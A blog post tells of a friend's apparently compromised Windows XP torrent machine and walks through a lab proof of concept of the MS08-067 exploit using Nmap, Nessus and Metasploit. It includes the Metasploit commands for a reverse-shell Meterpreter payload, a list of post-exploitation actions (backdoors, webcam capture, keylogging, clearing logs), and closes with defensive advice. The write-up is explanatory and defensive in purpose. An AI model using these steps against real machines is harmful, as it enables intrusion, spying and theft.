We sat, had a few drinks, he told me he had a couple of Open Source Projects he was working on and also described the technologies he had implemented to get one of his projects going. “Wait! Do these things actually exist?!” I asked… “Yes they do!”, he replied. Okay, I think I am going a little bit fast here; It all started when I was having a chat with one of my associates (long time close associate to be exact), he was telling me how excited he was to have spent the last couple of months investing in learning and implementing Open Source based Server Solutions. Most of his projects initially started / start off by him downloading a couple of Linux based software(s) (.iso images) in the form of torrents from Distrowatch using his TorrentBox. “What did you say, TorrentBox?” I asked, “Wait! Do these things actually exist?!” I asked (again (without even giving him the chance to answer))… “Yes they do!”, he replied. My questions or reasoning didn’t seem to move him, neither did his projects (as a whole)! His major concern was what he kept referring to as, The “Windows TorrentBox Hacked!” issue…! Say what!?
Without dwelling much on the setup of his TorrentBox, he volunteered to show me. He quickly switched on his laptop, logged in and immediately fired up his VMWare Workstation Console, (that he uses to centrally administer all his Virtual Machines) before proceeding to power up the TorrentBox Virtual Machine in question.
The first thing I saw was the screen on the left. Immediately I was hoping that, the situation he was facing was not the same issue I had come across (several times), the last being sometime last year in June. Okay, I will wait for a bit, I asked him to log on as I wanted to confirm the System’s Properties, I saw the screen below;
A combination of both screens, that is, the Windows XP + Service Pack 2 is never a good coalition, let alone the fact that Microsoft publicly announced that they had discontinued their support for Windows XP as of the 8th of April 2014! This is one of those few scenario’s I am quick to jump into conclusions 🙂 , my associate was a victim of the;
Windows XP Hack
Based on the information that my associate had provided, that is;
- He had picked up that there was quite a lot of high bandwidth usage that he could not account for, in the sense that, he was not the one who had actually used it. In some cases he had no pending torrents or torrents queued up at all and was away on holiday.
- He noticed a particular I.P Address that regularly connected to this box after going through the firewall logs. The firewall rules for the TorrentBox were very lax, that is, he allowed unrestricted outgoing and incoming traffic to and from any destination from the TorrentBox to the Internet on any Port. Fortunately he enabled logging for all the traffic to and from the TorrentBox.
- Every time he tried to correlate the ‘dodgy I.P’ address’ connection times on the firewall to the System events on the TorrentBox, he noticed that most of the times the logs would be empty. Something was clearing the logs to hide its system activities.
I strongly suspect this is the sequence of events that took place. This is just a proof of concept (PoC) and my assumption. Please Note: the following is for demonstration purposes and the PoC was carried out in a controlled environment. It basically shows you, how one can hack a Microsoft Windows XP machine running Service Pack 2 (SP2) and below, that is, Windows XP with no Service pack, Windows XP SP1 or Windows XP SP2;
Whilst he was legally downloading the actual files using the torrents from Distrowatch (which I would like to believe he grabbed from), unless otherwise (he grabbed torrents from somewhere else). Chances are, either one of the Seeders or Leechers he was downloading or seeding a particular torrent from or with’s intentions was to harvest I.P Addresses of Peers. As can be seen on our right, uTorrent has an option that can display all peers currently ‘in it for the torrent’, but then again, not everyone is in it for the torrent. I remember on one of the forums were some, self proclaimed Black Hat hacker mentioned that, he thinks it’s morally ethical to hack illegal downloaders. Eish!, I don’t even know what that means, perhaps its analogous to saying, its morally unethical for Robin Hood to steal from the poor but then again, two wrongs can never make it right! Back to my story, you can check my earlier post on some of the dangers of torrenting.
Assuming the Harvester (who I will also refer to as Hacker) had managed to grab my associates’ Public I.P Address and held onto and used it long enough before my associate was assigned another I.P address (remember Public I.P Addresses are dynamic) the following could have happened. For demonstration purposes I am using a Windows XP Machine also running Service Pack 2 but whose I.P Address is a Private I.P Address. The Hacker ran a Ping against the victim’s PC to check if the machine is online. In our demonstration, the I.P Address is: 192.168.179.130. As can be seen, the PC replies to our Ping, indicating it is up and running. (Click on image to make it bigger).
The next logical step, would be for the hacker to check and see if they are any Open Ports on the Victim’s PC using Nmap. Once they find any, check to see if they are any corresponding Services running on those Ports that might be vulnerable. In our case we can see that, one of the Ports, Port 445, is running the microsoft-ds service. This service is used to share printers and files across the network but is this Service vulnerable?
The hacker fires up Nessus to check if any of the services running on the Open ports are vulnerable, Wala! We can see that our smb service is susceptible to the Microsoft Windows Server Service Crafted RPC vulnerability (MS08-067). This vulnerability in the Server Service could allow Remote Code Execution but is there an exploit available for it?
We are going to launch the exploit against our victim’s PC, that is, I.P Address: 192.168.179.130. We select the exploit with the ‘use’ command. That is we type;
By typing this we set Metasploit to use this exploit on the target machine!
We then proceed to run the following command;
set RHOST 192.168.179.130
RHOST is the target’s IP Address, so we are basically setting it to the IP Address of the PC we need to attack, in our case – 192.168.179.130.
set payload windows/meterpreter/reverse_tcp
The payload is basically code that will be executed on the target system upon successful entry; in our case a Meterpreter (it’s an advanced version of a shell that executes on a remote machine). It enables us to run and have access to the remote victim’s shell on our local machine, so it more or less resembles a scenario where it’s like you are actually sitting in front of the victims physical machine.
set LHOST 192.168.179.128
LHOST is the Listener HOST. This is basically the IP Address that you are using to attack. This IP Address is the Address the Victim’s Meterpreter payload connects back to once the exploitation is successful.
Let the games begin!
We Launch the attack using Metasploit and assuming everything works accordingly, we will have access to the remote machine whose Meterpreter connects back to us. At this moment in time, we will basically have control of the remote machine, that is, the machine whose IP Address is: 192.168.179.130. In order to prevent our Meterpreter from being killed by the remote user, we should migrate to another process that is already running on the victim’s machine. In order to view the running processes we run the following command; ps
We then migrate our current process to one of the processes running, ideally we migrate to the Explorer.exe process which is one of the most important processes on Windows.
After successfully migrating from the Svchost.exe process that is currently running with the System account privileges we end up migrating to the Explorer.exe process that runs with more user privileges (as the currently logged in user). From this point on wards we can do what ever we want.
On our left is a screenshot that confirms the details of the victim’s machine. Besides the fact that the victim’s machine is running Windows XP Service Pack 2, we can even see that the currently logged in user has a list of torrents that he / she plans to download!
That being said, there is a whole list of things that you can do when you are in control of the victim’s machine. I will list a few;
- Install a backdoor on the victim’s machine, so we can connect back to the victim’s machine anytime without being detected.
- We can activate the webcam attached to the victim’s machine and take snapshots or video recordings of the person who is physically sitting in front of the remote machine.
- We can remotely activate voice recording, so as to record what the victim is saying or listening to.
- We can dump the local user accounts on the victim’s machine, this way we can crack the login user accounts passwords (offline). Assuming remote desktop is activated even log in with these user accounts.
- We can activate keystrokes logging on the victim’s machine, this way we can record all the keyboard input.
- We can even; copy, add, delete, rename or modify system files, user documents, folders and files on the machine.
- Last but not least, we can clear the event logs on the victim’s machine so as to hide our activities.
So how can one prevent against these type of attacks? The following can be useful:
- Make sure the software you are running is up to date and is still being supported by the vendor, that is, your Operating system and applications.
- Installing a Firewall or Web filtering software. Firewalls can help prevent malicious outgoing or incoming traffic especially if they are used in conjunction with Network Intrusion Detection Systems (NIDS) like Snort. Some antivirus software have mechanisms and capabilities to detect if an incoming or out going connection is safe, if detected as unsafe prevents users from visiting or connecting to the link. An example is Malwarebytes with Web Protection enabled or Eset Smart Security.
- The safest option is, to stay away from Microsoft Windows XP! Either upgrade your Operating System to a higher version or chuck that machine in the bin 🙂 If you can’t get rid of it, at least make sure it’s not connected to the network in any way, that is either, Internal Local Area Network or Internet.
For testing purposes, chances are, if you are trying to simulate the above Windows XP Hack Lab environment and are failing to exploit the test machine (despite it being a Windows XP machine with Service Pack 2), it could be because of the following reasons;
- The firewall is enabled or running on the victim’s machine, you have to disable it.
- The system is patched, the above exploit does not work on a fully patched Windows XP machine with Service Pack 3.
- An antivirus with firewall capabilities is running on the victim’s machine, disable it.
The above module exploits a parsing flaw in the path canonicalization code of netapi32.dll through the Server Service which allows Remote Code Execution. This vulnerability affects all Windows XP machines whose service pack is version 2 and below. Nonetheless, even if one runs Windows XP with Service Pack 3, Windows XP as a whole has so many security holes! Remember Microsoft does not support Windows XP anymore, that alone speaks volumes. It is highly advisable never to connect these systems to the internet at all as connecting them exposes them to these types of exploitations. My associate even made his situation worse by downloading torrents via Public Tracker; with public trackers anyone, anywhere in the world also downloading or posing to be downloading (but with other ulterior motives) the same torrent can view your Public I.P Address. This potentially increases your chances of being hacked!
In a nutshell, people should desist from using unsupported Operating Systems (O.S), let alone connect machines running these vulnerable O.Ses to the internet. I hope the above scenario has given you an idea on how this vulnerability can be easily triggered and exploited.
After all is said and done, remember to stay away from Windows XP, there is always a reason behind the message!